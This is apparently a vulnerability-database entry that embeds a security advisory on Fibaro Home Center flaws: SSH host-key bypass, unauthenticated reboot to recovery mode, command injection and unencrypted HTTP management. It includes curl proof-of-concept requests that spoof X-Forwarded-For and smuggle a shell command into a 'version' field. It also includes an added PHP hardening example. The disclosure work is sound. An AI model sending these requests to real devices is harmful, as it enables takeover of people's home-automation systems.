            "id": "CNNVD-202104-1332"
          },
          {
            "date": "2024-11-21T05:47:20.957000",
            "db": "NVD",
            "id": "CVE-2021-20992"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1332"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Fibaro Home Center 2 Security hole",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1332"
          }
        ],
        "trust": 0.6
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1332"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202104-0489

    Vulnerability from variot - Updated: 2024-11-23 22:05

    In Fibaro Home Center 2 and Lite devices with firmware version 4.540 and older an authenticated user can run commands as root user using a command injection vulnerability. IoT Inspector Research Lab Advisory IOT-20210408-0

    ~~~
    
                 title: Multiple vulnerabilities
        vendor/product: Fibaro Home Center Light / Fibaro Home Center 2
                        https://www.fibaro.com/
    vulnerable version: 4.600 and older
         fixed version: 4.610
            CVE number: CVE-2021-20989, CVE-2021-20990, CVE-2021-20991,
                        CVE-2021-20992
                impact: 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
                        9.8 (critical) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
                        7.2 (high) CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
                        8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
              reported: 2020-11-18
           publication: 2021-04-08
                    by: Marton Illes, IoT Inspector Research Lab
                        https://www.iot-inspector.com/

    Vendor description:
    -------------------

    "FIBARO is a global brand based on the Internet of Things technology. It provides solutions for building and home automation. FIBARO's headquarters and factory are located in Wysogotowo, 3 miles away from Poznan. The company employs app. 250 employees."

    https://www.fibaro.com/en/about-us/
    
    
    
    
    
    Vulnerability overview/description:
    -----------------------------------

    1) Cloud SSH Connection Man-in-the-Middle Attack (CVE-2021-20989)

    Home Center devices initiate SSH connections to the Fibaro cloud to provide remote access and remote support capabilities. This connection can be intercepted using a man-in-the-middle attack and a device initiated remote port-forward channel can be used to connect to the web management interface.

    IoT Inspector identified a disabled SSH host key check, which enables man-in-the-middle attacks.

    By initiating connections to the Fibaro cloud an attacker can eavesdrop on communication between the user and the device. As communication inside the SSH port-forward is not encrypted (see #4 on management interface), user sessions, tokens and passwords can be hijacked.

    2) Unauthenticated access to shutdown, reboot and reboot to recovery mode (CVE-2021-20990)

    An internal management service is accessible on port 8000 and some API endpoints could be accessed without authentication to trigger a shutdown, a reboot, or a reboot into recovery mode. In recovery mode, an attacker can upload firmware without authentication.

    Similar problems were also discovered by Pavel Cheremushkin from Kaspersky ICS Cert: https://securelist.com/fibaro-smart-home/91416/

    4) Unencrypted management interface (CVE-2021-20992)

    Home Center devices provide a web based management interface over unencrypted HTTP protocol. Communication between the user and the device can be eavesdropped to hijack sessions, tokens, and passwords. The management interface is only available over HTTP on the local network. The vendor recommends using the cloud-based management interface, which is accessible over HTTPS and requests are forwarded via an encrypted SSH connection between the Fibaro cloud and the device.

    Proof of concept:
    -----------------

    1) Cloud SSH Connection Man-in-the-Middle Attack

    Home Center devices initiate a SSH connection to the Fibaro cloud

    ./etc/init.d/fibaro/RemoteAccess

    <snip>
    DAEMON=/usr/bin/ssh

    ....

    case "$1" in
      start)

                    .....

        # get IP
        local GET_IP_URL="https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Serial}&HW_Key=${HW_Key}"
        local IP_Response; IP_Response=$(curl -f -s -S --retry 3 --connect-timeout 100 --max-time 100 "${GET_IP_URL}" | tr -d '
    !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~')

        # get PORT
        local GET_PORT_URL="https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_Serial}&HW_Key=${HW_Key}"
        local PORT_Response; PORT_Response=$(curl -f -s -S --retry 3 --connect-timeout 100 --max-time 100 "${GET_PORT_URL}" | tr -d '
    !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~')

                    ....

        start-stop-daemon --start --background --pidfile "${PIDFILE}" --make-pidfile --startas /usr/bin/screen \
        -- -DmS ${NAME} ${DAEMON} -y -K 30 -i /etc/dropbear/dropbear_rsa_host_key -R "${PORT_Response}":localhost:80 remote2@"${IP_Response}"
    </snip>

    The device uses dropbear ssh to initiate the connection; option -y disables any host-key checks, voiding much of the otherwise added transport-layer security by SSH: "Always accept hostkeys if they are unknown."

    The above "get IP" endpoint returns the address of the Fibaro cloud, e.g.:
    lb-1.eu.ra.fibaro.com

    An attacker can use DNS spoofing or other means to intercept the connection. By using any hostkey, the attacker can successfully authenticate the SSH connection. Once the connection is authenticated, the client initiates a remote port-forward:

    -R "${PORT_Response}":localhost:80

    This enables the attacker to access port 80 (management interface) of the device.

    A similar problem exists for remote support connections:

    ./opt/fibaro/scripts/remote-support.lua
    <snip>
    function handleResponse(response)
      responseJson = json.decode(response.data)
      print(json.encode(responseJson))

      local autoSSHCommand = 'ssh -y -K 30 -i /etc/dropbear/dropbear_rsa_host_key -R ' .. responseJson.private_ip .. ':' .. responseJson.port .. ':localhost:22 remote2@' .. responseJson.ip
      os.execute(autoSSHCommand)
    end

    function getSupportData()
      remoteUrl='https://dom.fibaro.com/get_support_route.php?PK_AccessPoint=' .. serialNumber .. '&HW_Key=' .. HWKey
      print(remoteUrl)

      http = net.HTTPClient({timeout = 5000})

      http:request(remoteUrl, {
        options = {
          method = 'GET'
        },
        success = function(response)
          handleResponse(response)
        end,
        error = function(error)
          print(error)
        end
      })
    end

    getSupportData()
    </snip>

    Here, the remote support endpoint returns the following data:
    {"ip":"fwd-support.eu.ra.fibaro.com","port":"XXXXX","private_ip":"10.100.YYY.ZZZ"}

    The same dropbear ssh client is used with option -y. In this case, port 22 (ssh) is made accessible through the port-forward. However, the device only allows public key authentication with a hard-coded SSH key. No further testing has been done on compromising the support SSH connection.

    2) Unauthenticated access to shutdown, reboot and reboot to recovery mode

    The device is running a nginx server, which forwards some requests to a lighttpd server (8000) for further processing:
    <snip>
                                    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

            location ~* \.php$ {
                proxy_pass   http://127.0.0.1:8000;
            }

            location ~* \.php\?.* {
                proxy_pass   http://127.0.0.1:8000;
            }
    </snip>

    The lighttpd server is not only accessible locally, but also via the local network.

    Authentication and authorization is implemented in PHP and there is a special check for connections originating from within the host. However, when checking the remote IP address, the header X-Forwarded-For is also considered:

    ./var/www/authorize.php
    <snip>
    function isLocalRequest()
    {
        $ipAddress = "";
        if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
            $ipAddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
        else
            $ipAddress = $_SERVER['REMOTE_ADDR'];

        $whitelist = array( '127.0.0.1', '::1' );
        if(in_array($ipAddress, $whitelist))
            return true;

        return false;
    }
    </snip>

    As the lighttpd service is available via the network, an attacker can inject the required header X-Forwarded-For as well.

    The check isLocalRequest is used to "secure" multiple endpoints:

    ./var/www/services/system/shutdown.php
    <snip>
    <?php
        require_once("../../authorize.php");

        if (!isLocalRequest() && !isAuthorized())
        {
           sendUnauthorized();
        }
        else
        {
            exec("systemShutdown");
        }
    ?>
    </snip>

    ./var/www/services/system/reboot.php
    <snip>

    function authorize()
    {
        return isAuthorized() || isAuthorizedFibaroAuth(array(role::USER, role::INSTALLER));
    }

    function handlePOST($text)
    {
        if (!isLocalRequest() && !authorize())
        {
           sendUnauthorized();
           return;
        }

        $params = tryDecodeJson($text);
        if(!is_null($params) && isset($params->recovery) && $params->recovery === true)
            exec("rebootToRecovery");
        else
            exec("systemReboot");
    }

    $requestBody = file_get_contents('php://input');
    $requestMethod = $_SERVER['REQUEST_METHOD'];

    if ($requestMethod == "POST")
        handlePOST($requestBody);
    else
        setStatusMethodNotAllowed();

    </snip>

    An attacker can issue the following HTTP request to reboot the device into recovery mode:

    curl -H 'X-Forwarded-For: 127.0.0.1' -H 'Content-Type: application/json' -d '{"recovery":true}' http://DEVICE:8000/services/system/reboot.php

    In recovery mode, firmware images can be updated without authentication.
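As an added example (not from the advisory and not Fibaro's firmware code), the isLocalRequest() logic quoted above is placed beside a hardened variant that only honours X-Forwarded-For when the TCP peer is the trusted nginx proxy, and then uses the hop nginx itself appended. It assumes nginx on 127.0.0.1 sets the header with proxy_add_x_forwarded_for, as in the quoted configuration; all addresses and request shapes are constructed.

```php
<?php
// Added example, not Fibaro's code: the advisory's isLocalRequest() beside a
// hardened variant. Assumptions: nginx on 127.0.0.1 is the only legitimate
// proxy in front of lighttpd and sets X-Forwarded-For with
// proxy_add_x_forwarded_for, which APPENDS the peer it saw to whatever the
// client sent. Binding lighttpd to 127.0.0.1 remains the primary fix; this
// check is the defence-in-depth layer behind it.

const LOCAL_ADDRS     = ['127.0.0.1', '::1'];
const TRUSTED_PROXIES = ['127.0.0.1', '::1'];

// Logic from ./var/www/authorize.php: a client-supplied header wins outright.
function isLocalRequestVulnerable(array $server): bool
{
    $ipAddress = !empty($server['HTTP_X_FORWARDED_FOR'])
        ? $server['HTTP_X_FORWARDED_FOR']
        : ($server['REMOTE_ADDR'] ?? '');
    return in_array($ipAddress, LOCAL_ADDRS, true);
}

// Resolve the address the request really came from.
function clientAddress(array $server): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    $xff    = trim($server['HTTP_X_FORWARDED_FOR'] ?? '');

    // Direct connections (anything not from the proxy) may carry any header
    // they like; the TCP peer address is the only fact we have about them.
    if ($xff === '' || !in_array($remote, TRUSTED_PROXIES, true)) {
        return $remote;
    }

    // Proxied: the rightmost hop is the one nginx appended, so it is the
    // only entry the client could not have chosen.
    $hops = array_map('trim', explode(',', $xff));
    $last = end($hops);
    return filter_var($last, FILTER_VALIDATE_IP) !== false ? $last : '';
}

function isLocalRequestHardened(array $server): bool
{
    return in_array(clientAddress($server), LOCAL_ADDRS, true);
}

// Constructed request shapes (not captured traffic) covering each path.
function demo(): array
{
    $cases = [
        // The advisory's request: LAN client straight to :8000, forged header.
        'direct, spoofed XFF'    => ['REMOTE_ADDR' => '192.168.1.50',
                                     'HTTP_X_FORWARDED_FOR' => '127.0.0.1'],
        // Same forgery sent through nginx; nginx appends the true peer.
        'via nginx, spoofed XFF' => ['REMOTE_ADDR' => '127.0.0.1',
                                     'HTTP_X_FORWARDED_FOR' => '127.0.0.1, 192.168.1.50'],
        // Genuine on-box caller (e.g. an init script) talking to lighttpd.
        'local, no XFF'          => ['REMOTE_ADDR' => '127.0.0.1'],
        // Ordinary LAN user through nginx.
        'via nginx, LAN user'    => ['REMOTE_ADDR' => '127.0.0.1',
                                     'HTTP_X_FORWARDED_FOR' => '192.168.1.20'],
    ];
    $out = [];
    foreach ($cases as $name => $server) {
        $out[$name] = [
            'vulnerable' => isLocalRequestVulnerable($server),
            'hardened'   => isLocalRequestHardened($server),
        ];
    }
    return $out;
}

foreach (demo() as $name => $r) {
    printf("%-24s vulnerable=%-5s hardened=%s\n", $name,
        var_export($r['vulnerable'], true), var_export($r['hardened'], true));
}
```

Run with the php CLI; the direct request to port 8000 carrying a forged header is the only case on which the two checks disagree, which is exactly the request the advisory's curl command sends.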
    
    
    
    
    
    3) Authenticated remote command execution (versions before 4.550)

    Backup & restore operations could be triggered through HTTP endpoints:

    ./var/www/services/system/backups.php
    <snip>
    function restoreBackup($params)
    {
        if (getNumberOfInstances('{screen} SCREEN -dmS RESTORE') > 0)
        {
            setStatusTooManyRequests();
            return;
        }

        $type = $params->type;
        $id = $params->id;
        $version = $params->version;

        if (is_null($id) || !is_numeric($id) || $id < 1 )
        {
            setStatusBadRequest();
            return;
        }

        $hcVersion = exec("cat /mnt/hw_data/serial | cut -c1-3");

        if ($type == "local" && $hcVersion == "HC2" || $type == "remote")
        {
            $version ?
                    exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. $id . ' ' . $version) :
                    exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. $id);
        }
        else
        {
            setStatusBadRequest();
            return;
        }

        setStatusAccepted();
    }
    </snip>

    The parameter $version is not sanitized or escaped, which allows an attacker to inject shell commands into the exec() call:

    cat > /tmp/exploit <<- EOM
    {"action": "restore", "params": {"type": "remote", "id": 1, "version": "1; INJECTED COMMAND"}}
    EOM

    curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'content-type: application/json' -d@/tmp/exploit http://DEVICE/services/system/backups.php

    Version 4.550 and later have proper escaping:
    <snip>
        $version = escapeshellarg($params->version);
    </snip>
    
    
    
    
    
    4) Unencrypted management interface

    Nmap shows a few open ports on the box:
    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    8000/tcp open  http-alt

    Both 80/tcp and 8000/tcp can be accessed over unencrypted HTTP.
    
    
    
    
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    

    Vulnerable / tested versions:

    Vulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest version at the time of the discovery
    Vulnerabilities 1, 2, 3, 4 were confirmed on 4.540, 4.530

    Solution:

    Upgrade to the version 4.610 or latest version, which fixes vulnerabilities 1, 2 and 3.
    Vulnerability 4 is not fixed as the vendor assumes that the local network is trusted and the device only provides wired network access. Furthermore, the vendor recommends using the cloud-based management interface, which is accessible over HTTPS and requests are forwarded via an encrypted SSH connection between the Fibaro cloud and the device.

    Advisory URL:

    https://www.iot-inspector.com/blog/advisory-fibaro-home-center/

    Vendor contact timeline:

    2020-11-18: Contacting Fibaro through support@fibaro.com, support-usa@fibaro.com, info@fibaro.com, recepcja@fibargroup.com
    2020-11-23: Contacting Fibaro on Facebook & LinkedIn, got response on LinkedIn
    2020-11-24: Advisory sent to Fibaro by email
    2020-12-01: Fibaro confirmed the receipt of the advisory
    2021-02-02: Meeting with Fibaro to discuss the vulnerabilities and fixes
    2021-03-16: Fibaro beta release (4.601) with the fixes
    2021-03-24: Fibaro applies for CVE numbers
    2021-03-31: Fibaro GA release (4.610) with the fix
    2021-04-08: IoT Inspector Research Lab publishes advisory

    ~~~
    
    
    
    The IoT Inspector Research Lab is an integrated part of IoT Inspector.

    IoT Inspector is a platform for automated security analysis and compliance checks of IoT firmware. Our mission is to secure the Internet of Things. In order to discover vulnerabilities and vulnerability patterns within IoT devices and to further enhance automated identification that allows for scalable detection within IoT Inspector, we conduct excessive security research in the area of IoT.

    Whenever the IoT Inspector Research Lab discovers vulnerabilities in IoT firmware, we aim to responsibly disclose relevant information to the vendor of the affected IoT device as well as the general public in a way that minimizes potential harm and encourages further security analyses of IoT systems.

    You can find our responsible disclosure policy here:
    https://www.iot-inspector.com/responsible-disclosure-policy/

    ~~~

    Interested in using IoT Inspector for your research or product?
    Mail: research at iot-inspector dot com
    Web: https://www.iot-inspector.com
    Blog: https://www.iot-inspector.com/blog/
    Twitter: https://twitter.com/iotinspector

    EOF Marton Illes / @2021


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0489",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "home center lite",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "fibaro",
            "version": "4.540"
          },
          {
            "model": "home center 2",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "fibaro",
            "version": "4.540"
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20991"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Marton Illes",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1334"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-20991",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-20991",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2021-20991",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "info@cert.vde.com",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2021-20991",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-20991",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-20991",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-1334",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-20991",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20991"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1334"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20991"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20991"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "In Fibaro Home Center 2 and Lite devices with firmware version 4.540 and older an authenticated user can run commands as root user using a command injection vulnerability. IoT Inspector Research Lab Advisory IOT-20210408-0\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n             title: Multiple vulnerabilities \n\n    vendor/product: Fibaro Home Center Light / Fibaro Home Center 2\n\n                    https://www.fibaro.com/\n\nvulnerable version: 4.600 and older\n\n     fixed version: 4.610\n\n        CVE number: CVE-2021-20989, CVE-2021-20990, CVE-2021-20991, \n\n                    CVE-2021-20992\n\n            impact: 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n                    9.8 (critical)\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n                    7.2 (high) CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n                    8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n          reported: 2020-11-18\n\n       publication: 2021-04-08\n\n                by: Marton Illes, IoT Inspector Research Lab\n\n                    https://www.iot-inspector.com/\n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nVendor description:\n\n-------------------\n\n\"FIBARO is a global brand based on the Internet of Things technology. It \n\nprovides solutions for building and home automation. FIBARO\u0027s headquarters\n\nand factory are located in Wysogotowo, 3 miles away from Poznan. The company\n\nemploys app. 250 employees.\"\n\n \n\nhttps://www.fibaro.com/en/about-us/\n\n \n\n \n\nVulnerability overview/description:\n\n-----------------------------------\n\n1) Cloud SSH Connection Man-in-the-Middle Attack (CVE-2021-20989)\n\nHome Center devices initiate SSH connections to the Fibaro cloud to provide \n\nremote access and remote support capabilities. 
This connection can be \n\nintercepted using a man-in-the-middle attack and a device initiated remote \n\nport-forward channel can be used to connect to the web management interface. \n\n\nIoT Inspector identified a disabled SSH host key check, which enables \n\nman-in-the-middle attacks. \n\n \n\nBy initiating connections to the Fibaro cloud an attacker can eavesdrop on \n\ncommunication between the user and the device. As communication inside the \n\nSSH port-forward is not encrypted (see #4 on management interface), user \n\nsessions, tokens and passwords can be hijacked. \n\n \n\n2) Unauthenticated access to shutdown, reboot and reboot to recovery mode \n\n(CVE-2021-20990)\n\nAn internal management service is accessible on port 8000 and some API \n\nendpoints could be accessed without authentication to trigger a shutdown, a \n\nreboot, or a reboot into recovery mode. In recovery mode, an attacker can \n\nupload firmware without authentication. \n\nSimilar problems were also discovered by Pavel Cheremushkin from Kaspersky \n\nICS Cert: https://securelist.com/fibaro-smart-home/91416/\n\n \n\n4) Unencrypted management interface (CVE-2021-20992)\n\nHome Center devices provide a web based management interface over\nunencrypted \n\nHTTP protocol. Communication between the user and the device can be \n\neavesdropped to hijack sessions, tokens, and passwords. The management \n\ninterface is only available over HTTP on the local network. The vendor \n\nrecommends using the cloud-based management interface, which is accessible\nover \n\nHTTPS and requests are forwarded via an encrypted SSH connection between the\n\n\nFibaro cloud and the device. \n\n \n\n \n\nProof of concept:\n\n-----------------\n\n1) Cloud SSH Connection Man-in-the-Middle Attack\n\n \n\nHome Center devices initiate a SSH connection to the Fibaro cloud\n\n \n\n \n\n./etc/init.d/fibaro/RemoteAccess\n\n \n\n\u003csnip\u003e\n\nDAEMON=/usr/bin/ssh\n\n \n\n.... 
\n\n \n\ncase \"$1\" in\n\n  start)\n\n    \n\n                ..... \n\n \n\n    # get IP\n\n    local\nGET_IP_URL=\"https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Seria\nl}\u0026HW_Key=${HW_Key}\"\n\n    local IP_Response; IP_Response=$(curl -f -s -S --retry 3\n--connect-timeout 100 --max-time 100 \"${GET_IP_URL}\" | tr -d \u0027\n!\"#$%\u0026|\u0027\"\u0027\"\u0027|()*+,/:;\u003c=\u003e?@[|\\\\|]|^`|\\||{}~\u0027)\n\n \n\n    # get PORT\n\n    local\nGET_PORT_URL=\"https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_S\nerial}\u0026HW_Key=${HW_Key}\"\n\n    local PORT_Response; PORT_Response=$(curl -f -s -S --retry 3\n--connect-timeout 100 --max-time 100 \"${GET_PORT_URL}\" | tr -d \u0027\n!\"#$%\u0026|\u0027\"\u0027\"\u0027|()*+,/:;\u003c=\u003e?@[|\\\\|]|^`|\\||{}~\u0027)\n\n \n\n                .... \n\n                \n\n    start-stop-daemon --start --background --pidfile \"${PIDFILE}\"\n--make-pidfile --startas /usr/bin/screen \\\n\n    -- -DmS ${NAME} ${DAEMON} -y -K 30 -i\n/etc/dropbear/dropbear_rsa_host_key -R \"${PORT_Response}\":localhost:80\nremote2@\"${IP_Response}\"\n\n\u003c/snip\u003e\n\n \n\nThe device uses dropbear ssh to initiate the connection; option -y disables\nany \n\nhost-key checks, voiding much of the otherwise added transport-layer\nsecurity \n\nby SSH: \"Always accept hostkeys if they are unknown.\"\n\n \n\nThe above \"get IP\" endpoint returns the address of the Fibaro cloud, e.g.: \n\nlb-1.eu.ra.fibaro.com\n\n \n\nAn attacker can use DNS spoofing or other means to intercept the connection. \nBy \n\nusing any hostkey, the attacker can successfully authenticate the SSH \n\nconnection. Once the connection is authenticated, the client initiates a\nremote \n\nport-forward:\n\n-R \"${PORT_Response}\":localhost:80\n\n \n\nThis enables the attacker to access port 80 (management interface) of the \n\ndevice. 
\n\n \n\nA similar problem exists for remote support connections:\n\n \n\n./opt/fibaro/scripts/remote-support.lua\n\n\u003csnip\u003e\n\nfunction handleResponse(response)\n\n  responseJson = json.decode(response.data)\n\n  print(json.encode(responseJson))\n\n \n\n  local autoSSHCommand = \u0027ssh -y -K 30 -i\n/etc/dropbear/dropbear_rsa_host_key -R \u0027  .. responseJson.private_ip..  \u0027:\u0027\n.. responseJson.port .. \u0027:localhost:22 remote2@\u0027 .. responseJson.ip\n\n  os.execute(autoSSHCommand)\n\nend\n\n \n\nfunction getSupportData()\n\n  remoteUrl=\u0027https://dom.fibaro.com/get_support_route.php?PK_AccessPoint=\u0027\n.. serialNumber .. \u0027\u0026HW_Key=\u0027 .. HWKey\n\n  print(remoteUrl)\n\n \n\n  http = net.HTTPClient({timeout = 5000})\n\n \n\n  http:request(remoteUrl, {\n\n    options = {\n\n      method = \u0027GET\u0027\n\n    },\n\n    success = function(response)\n\n      handleResponse(response)\n\n    end,\n\n    error = function(error)\n\n      print(error)\n\n    end\n\n  })\n\nend\n\n \n\ngetSupportData()\n\n\u003c/snip\u003e\n\n \n\nHere, the remote support endpoint returns the following data:\n\n{\"ip\":\"fwd-support.eu.ra.fibaro.com\",\"port\":\"XXXXX\",\"private_ip\":\"10.100.YYY\n.ZZZ\"}\n\n \n\nThe same dropbear ssh client is used with option -y. In this case, port 22 \n\n(ssh) is made accessible through the port-forward. However, the device only \n\nallows public key authentication with a hard-coded SSH key. No further\ntesting \n\nhas been done on compromising the support SSH connection. 
